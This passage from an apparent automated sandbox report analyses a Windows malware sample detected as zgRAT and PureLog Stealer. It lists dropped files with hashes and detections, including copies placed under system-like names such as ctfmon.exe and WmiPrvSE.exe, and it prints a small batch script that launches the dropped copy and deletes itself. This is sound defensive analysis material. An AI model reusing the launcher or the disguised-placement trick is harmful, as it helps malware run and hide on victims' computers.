                                3XtEci4Mmo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                    6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      aW6kSsgdvv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          kJrNOFEGbQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            lEwK4xROgV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              zZ1Y43bxxV.exeGet hashmaliciousDCRatBrowse
                                                VqGD18ELBM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                  Created / dropped Files

                                                  C:\Program Files\Mozilla Firefox\uninstall\ea1d8f6d871115

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with very long lines (377), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):377
                                                  Entropy (8bit):5.850339764270371
                                                  Encrypted:false
                                                  SSDEEP:6:Dbn27hiRXXBXF00Q0KfQCi0Wz4bMkshUirZuYt6IsweswHNd84R2JoslIjUUd3V5:Dbnahg0Ml0fAUirQS4weLX802JcF5
                                                  MD5:4F1FE7065279D304E9F0CA964D50C183
                                                  SHA1:9E68E92AD4EC5CD19ABB71169285B132F744934D
                                                  SHA-256:24C590FC932AD14E064763EE376686313C0C6C4AB276941358A65000DCE56BB6
                                                  SHA-512:6B537202793249B039A0488584E66A8304469FD8DCDEC82AD4ADB1004F74A2BE129AC6BC0E236D5AF359A31F8DFDBB9BC50560AFD6EE1B11939CBA90F495DEB1
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:jZqJa1jh9TXBt8GdpEcVGWzK6MFEu0pqVYQCHaKiYtW4rVGFQzWR4iQNkfMNwfwIorqVrDWO347WA4dlFAx5eXvwHDcmO7v26NQAovXMdHYAl4MpClHwr1oQ54OoluA5IEawnc6UmlbW9uKM0wjnz9LEjAFugtltHc2heaCjowKGaRQKtBxzKWGI3VNnXMy2AsPg2nsauA8CzEoRt4Ae6viuWtoINYMc8RGrCtSGTXFJXDTyq53dLT6OJeKJ8jNVxgEh87P9m3LiqZWTZ0cRetRpV1hhjIItKtW19vztq30RIXhuH1tIH50EPYMGZradvbY7CfToAslk29g7TwarZ9mO2RmkisT8dXfq8krmhFIYUQLP2PwnRsEwz

                                                  C:\Program Files\Mozilla Firefox\uninstall\upfc.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4515328
                                                  Entropy (8bit):7.193302330489937
                                                  Encrypted:false
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  MD5:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  SHA1:A6B5EB9800EA4FEF6DA44D306D743941143D87EA
                                                  SHA-256:21922A6CC19A72509D69FB830853A1E7E3AF5B3E44134DA7D1B65C3EE78F6037
                                                  SHA-512:78C5F18762A688557EB4994E6685481B3883E6C0DCC27C7ABB05B7FE524BED24E949EF5AE2B91B9DA6332B26D14B1AB1ABD35961235D2D4EE6B8663E0849FE87
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text....};.. ...~;................. ..`.rsrc...p.....;.......;.............@....reloc........;.......;.............@..B.................;.....H...........h.......j...H....0.7.;......................................0..........(.... ........8........E........\...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{y...:....& ....8....*....0.......... ........8........E............G...........w...8....r...ps....z*~....(I... .... .... ....s....~....(M....... ....8........~....(Q...~....(U... ....<.... ........8h...8.... ....~....{....:S...& ....8H......... ....~....{....9....& ....8#...~....

                                                  C:\Program Files\Mozilla Firefox\uninstall\upfc.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Program Files\Uninstall Information\72f9cbbcf2062a

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with very long lines (484), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):484
                                                  Entropy (8bit):5.803141929256237
                                                  Encrypted:false
                                                  SSDEEP:12:bUqhkmtA5QWkC+33YZzALYaI14KMfZOVy4iTV4:bumC5QWkCO4ZAZOV04
                                                  MD5:D0F541A7B43587EDB270D3DEAC5D14DB
                                                  SHA1:8F07C4BF623B582E33CCB0FB03BE96AED11FC173
                                                  SHA-256:1461344A4A17F9FFA06B3E9C1EBF6E719597202161222546C06ABD2B5672079A
                                                  SHA-512:4DD3C99D5DB38904E56132B2370BC19D9DE7FB5F37A4394CFBF3ED35618B8AF16817DE2635E099467B8D1EAB31B6FDFE96A24A209F6A340357B058897CB0492C
                                                  Malicious:false
                                                  Preview:yYcoAwgcBzaWov05olq1eVH99GuqsRMskods4QiCeeLoBPhAJsVJxX8cQdo3C0ttmsvARHAXCoWAKd8titgA5C4MpBbblp9nvbBSdhsCr8HJB8Sxf5USUsykxjUQpivWosPsbpQAAdS75vLrso6qVqTCnbf4NcWJMveStjWzpTS0a0pCXniBmFB7YMFAJVxiGJvKQ37IRGBCYdlwvdgk4VgGtg3geVpTfttQFfvepZtfE9j5lTOqzNovmoat9bo6argouVqQrB5elACu785LH9dSF7nbFCfNuxEWc4LPm79yRJJmlpvBgdzbONiwrPLpgrty6qSCwpiJ9pA6yBzZQerR8nHPWZiXwUSkZVq5XtO05pciMm7pZvYB9c0TiCqXHKXpXahcV4ChP0WSKiCub28A5Qk7eWWUC0tvSxLwEfUft1vJFiI9966OLXtHzj78hseZHl9XXQp6hdREeb16OWUG4ej5DE7fhV7A

                                                  C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4515328
                                                  Entropy (8bit):7.193302330489937
                                                  Encrypted:false
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  MD5:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  SHA1:A6B5EB9800EA4FEF6DA44D306D743941143D87EA
                                                  SHA-256:21922A6CC19A72509D69FB830853A1E7E3AF5B3E44134DA7D1B65C3EE78F6037
                                                  SHA-512:78C5F18762A688557EB4994E6685481B3883E6C0DCC27C7ABB05B7FE524BED24E949EF5AE2B91B9DA6332B26D14B1AB1ABD35961235D2D4EE6B8663E0849FE87
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text....};.. ...~;................. ..`.rsrc...p.....;.......;.............@....reloc........;.......;.............@..B.................;.....H...........h.......j...H....0.7.;......................................0..........(.... ........8........E........\...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{y...:....& ....8....*....0.......... ........8........E............G...........w...8....r...ps....z*~....(I... .... .... ....s....~....(M....... ....8........~....(Q...~....(U... ....<.... ........8h...8.... ....~....{....:S...& ....8H......... ....~....{....9....& ....8#...~....

                                                  C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\24dbde2999530e

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with very long lines (617), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):617
                                                  Entropy (8bit):5.877421259663639
                                                  Encrypted:false
                                                  SSDEEP:12:ufDKTRRL/farQ6XnRdqjaWvMIIvsl41YIn5CE/51zcUY2M2:ufwRL8n7krt5eYoMY1ze4
                                                  MD5:E2897BBFC8EF4D5763F1357E07F4F8E7
                                                  SHA1:C05C81A6553A076A7D58BA3217D6D4111B2A6584
                                                  SHA-256:2B4DC77692B5CF6796E5B8D1A7C0B96D4B35DC8E15447CB840B5381E24A927ED
                                                  SHA-512:AC3FF6E6A7E20C9526E0C7F56D6D0DC1998D648CFA877DAFCC0A001269EE42313199A932431343BBB4D0A01176C7A3A00918EA23E028BAFF1ACC24FC71320EAA
                                                  Malicious:false
                                                  Preview:tQAqsFpnXsBuKXXfmBEUTTKZMfQrHZWYdukz4y1zYbjwglwn81aceaSaGkeMz7f8VmQZwikxKO52uX3ksnsQ944DcKtTToAa5kb3VW0aQmRPeZqtr4dMPP9asM7mzRegOf6J59PVwR9XmoiCe9lZKxKqlALIZOl8HvB9dgxspHZ8PmyEo5HzqEVaUQi5yG6ipAP0mij7M2uCYMa9LGeeGwRCZkpM823iL0SOW7bFVKnxUTCHzitrlcc3sMbC3W8T8L1h4LmOpZI5JesGihXZJM7tYZgKgZL9MTzIceNo6eCMTgtOeVdW9iKwOIIfpcrQNItzojoDTtdoJuZ2pRqL5yAnJC4UWs8exw8Kx3j4raCQFfmesQzYvgUZIFqmpUqlu81XvOEvrvefvuioZZlG3ksQbjCrN7PXtbfGoOsdLDqACznYhCMPsksKQk6LMXhtgGwUPb9LrI4z3sNm6nKLv9oIsU0DSgQyf7e5DSJFCBikq3RiXUPiMW8gcnl4k62K1GT6NSjneFJubEbzDSq8RrmJ88dZqOeFIXskjUUEvlDHMOEXLv0SQ43JeJ7OyJ6PkDmEV1Ps8lNpne7u4FN5YMzNeiGaXFQloygIl9BUf

                                                  C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4515328
                                                  Entropy (8bit):7.193302330489937
                                                  Encrypted:false
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  MD5:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  SHA1:A6B5EB9800EA4FEF6DA44D306D743941143D87EA
                                                  SHA-256:21922A6CC19A72509D69FB830853A1E7E3AF5B3E44134DA7D1B65C3EE78F6037
                                                  SHA-512:78C5F18762A688557EB4994E6685481B3883E6C0DCC27C7ABB05B7FE524BED24E949EF5AE2B91B9DA6332B26D14B1AB1ABD35961235D2D4EE6B8663E0849FE87
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text....};.. ...~;................. ..`.rsrc...p.....;.......;.............@....reloc........;.......;.............@..B.................;.....H...........h.......j...H....0.7.;......................................0..........(.... ........8........E........\...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{y...:....& ....8....*....0.......... ........8........E............G...........w...8....r...ps....z*~....(I... .... .... ....s....~....(M....... ....8........~....(Q...~....(U... ....<.... ........8h...8.... ....~....{....:S...& ....8H......... ....~....{....9....& ....8#...~....

                                                  C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Recovery\26c12092da979c

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):194
                                                  Entropy (8bit):5.668032049459092
                                                  Encrypted:false
                                                  SSDEEP:3:wU7tCHCidsBIdPA7UdKRS4D4TAysOZrVjV+K3gW23QPesQHe69zAJ3XiQywRc2fx:wU7t3idVDdKzUoa23QWx+6Rqd1S75ytX
                                                  MD5:3C5A604B3CE3A2A2A37B337A6C539C37
                                                  SHA1:B2BA452CB2249A2614B5B93E510DA21B4925E262
                                                  SHA-256:95C08984F5D330DAE34FC53AE4E6873ED1C0296C7ACE427F3C25E7070C854470
                                                  SHA-512:2AC373E537F1ED12C2816E391702A3079AC3DB5B073E3FD83B6B59561D6B8F1B42329058C66161F3EFDF69DFE4C4E32C9C2B0334FA8867187DE8850F0A0F5F66
                                                  Malicious:false
                                                  Preview:JHQjqXl8qUHNMG4xmBPjXfsDCuC0H4DXbWJZalmvm3JixIiqfSeawqxoZMg6Uu0wRuw07fWAZe6eWJQ4MWVyZmkuif9OFpa2CXRCWrsA6eBStTSP6lu7YBWpKBRcfI5tDEb82OienV25lRAONuRd5ddBAl2UZQeyiRPp2TXsDPTDJbE2ACPv0cxkla7RVOEX0D

                                                  C:\Recovery\ctfmon.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4515328
                                                  Entropy (8bit):7.193302330489937
                                                  Encrypted:false
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  MD5:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  SHA1:A6B5EB9800EA4FEF6DA44D306D743941143D87EA
                                                  SHA-256:21922A6CC19A72509D69FB830853A1E7E3AF5B3E44134DA7D1B65C3EE78F6037
                                                  SHA-512:78C5F18762A688557EB4994E6685481B3883E6C0DCC27C7ABB05B7FE524BED24E949EF5AE2B91B9DA6332B26D14B1AB1ABD35961235D2D4EE6B8663E0849FE87
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text....};.. ...~;................. ..`.rsrc...p.....;.......;.............@....reloc........;.......;.............@..B.................;.....H...........h.......j...H....0.7.;......................................0..........(.... ........8........E........\...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{y...:....& ....8....*....0.......... ........8........E............G...........w...8....r...ps....z*~....(I... .... .... ....s....~....(M....... ....8........~....(Q...~....(U... ....<.... ........8h...8.... ....~....{....:S...& ....8H......... ....~....{....9....& ....8#...~....

                                                  C:\Recovery\ctfmon.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Users\user\AppData\Local\Microsoft\72f9cbbcf2062a

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with very long lines (620), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):620
                                                  Entropy (8bit):5.88627203484711
                                                  Encrypted:false
                                                  SSDEEP:12:PDGooMIVyfixp65SOMV07DxkIyE1/w4Uv5V8YD5bLaJVDx+cZlVol4Fuxjda:PjVuy6/Iku1/LU5Vf5bLCzlVol3j0
                                                  MD5:DAD2B147F98BFC19F8D9F57C5579592A
                                                  SHA1:C147D75CBB53BD2245230F12B6AA65D15F25D26D
                                                  SHA-256:E09EAE22EDC592BFA2E66CAD71D8C15AFBBE628E1AE2C683357848F8BF4317D7
                                                  SHA-512:80133538AA33A47E62E07868C598E5147186C19E69B291EB9CF835A743D321DC87067B0F888238B6FC4E97418F4C221D6DA0E61CE1548C2586A0775FCDC0BD93
                                                  Malicious:false
                                                  Preview:Hfe08tExJT0O3mFXsT6qruSt1yf6uyA18sIqvCQDidiv5lRcpfAwVt4WNu8KOIDVT9PLdZlqC2HOLhxQgCROxOfPywdADFyaZNc5VG9P4UtclqKq7snL0zhEeAWq6km7Dry8E14aCBUcfDnHlwDVbnjkqXbVtTTTswY41MlFxNJyeEjaWPEJhRfaHNSrajrtsButosPZL8hOdvFlxA8dOJvbQ7wo33pOfaFdU0wo9o8jtQ7WIq3ZkNejPTcq5lfRSTtDplR7OUejLMr9AafM9PnR5gOAYFsXJqQah3rgZ6LQt5YDlcpfFSSDpbHIXQiImHaf5RcGt9xDDXiAILY5ZMR0YMuGviIJXDole2HUAivGfO9R2HAM1msZzkHsgWVL1npAt6fPDE50bLUJNcNoi5SvUOv4vYyoNkO1j9i6muJxr18oP8fDIrn5V4peKldoPRn06cjN4RBxwfDdQHox3vfg7SgpTEvAQehZOHrxYRI1pzJ00LND7qvewG3o6340gBgS7nPJZ0Ylmo1HJpzH0rDksCnHND1fXSVoS02M6DoGRJ2IPvfQEw9z76j5AH5W93OTSNySwmLwD7SjKf2cikakTgqWR7MzIRHX4izB7Mdb

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\85D5ktqjpd.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1698
                                                  Entropy (8bit):5.367720686892084
                                                  Encrypted:false
                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                  MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                  SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                  SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                  SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                  C:\Users\user\AppData\Local\Microsoft\XWWZQvSvBozA.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4515328
                                                  Entropy (8bit):7.193302330489937
                                                  Encrypted:false
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  MD5:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  SHA1:A6B5EB9800EA4FEF6DA44D306D743941143D87EA
                                                  SHA-256:21922A6CC19A72509D69FB830853A1E7E3AF5B3E44134DA7D1B65C3EE78F6037
                                                  SHA-512:78C5F18762A688557EB4994E6685481B3883E6C0DCC27C7ABB05B7FE524BED24E949EF5AE2B91B9DA6332B26D14B1AB1ABD35961235D2D4EE6B8663E0849FE87
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text....};.. ...~;................. ..`.rsrc...p.....;.......;.............@....reloc........;.......;.............@..B.................;.....H...........h.......j...H....0.7.;......................................0..........(.... ........8........E........\...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{y...:....& ....8....*....0.......... ........8........E............G...........w...8....r...ps....z*~....(I... .... .... ....s....~....(M....... ....8........~....(Q...~....(U... ....<.... ........8h...8.... ....~....{....:S...& ....8H......... ....~....{....9....& ....8#...~....

                                                  C:\Users\user\AppData\Local\Microsoft\XWWZQvSvBozA.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):150
                                                  Entropy (8bit):5.164152792577076
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7VD70EovBktKcKZG1t+kiE2J5xAIPLqn:hCRLuVFOOr+DE7VGvKOZG1wkn23fun
                                                  MD5:8E093EB5C8C8FCD7426F29587314CBAA
                                                  SHA1:C001C8DC21A005F5090858814ACCB42D23DA32FC
                                                  SHA-256:11263886A2406D68C866309D04B5C2F05F5C5A06E1D72D4336AE9C6D1FF1568C
                                                  SHA-512:93AD2D7D349ACBDDE043EF8B4B95F4C9D57958279D1208C803D17C0D2B819C5927B084DB91C469F6610DC07A725211E40ED01050ADF2CEA264F4185F7D04BBCD
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\ctfmon.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\KgQDHOJvgq.bat"

                                                  C:\Users\user\AppData\Local\Temp\UorNf9LNUt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.323856189774724
                                                  Encrypted:false
                                                  SSDEEP:3:H8q8PS/jJWddH5X:H8KbkDJ
                                                  MD5:C20040FF05F03E462B7D04256F998FF3
                                                  SHA1:1C65BABAA30F90D1806867DC7BF554ABFD82DBFD
                                                  SHA-256:60F7FB060408C760F55C1F1D06339A5647FD265FD27C0ED219999529A9809FB0
                                                  SHA-512:4D332777BDD4A9910725C505AFFBC51D1D628F741A116CA4141B16CCE995E1E466631417E1A8319DA2D3A9F1F24D330651249D10F7C76DA795BC5ED835DBC13C
                                                  Malicious:false
                                                  Preview:5B1YOYjwvzV2VlAz8yI4D3ZQ2

                                                  C:\Users\user\Desktop\CJjejXjo.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
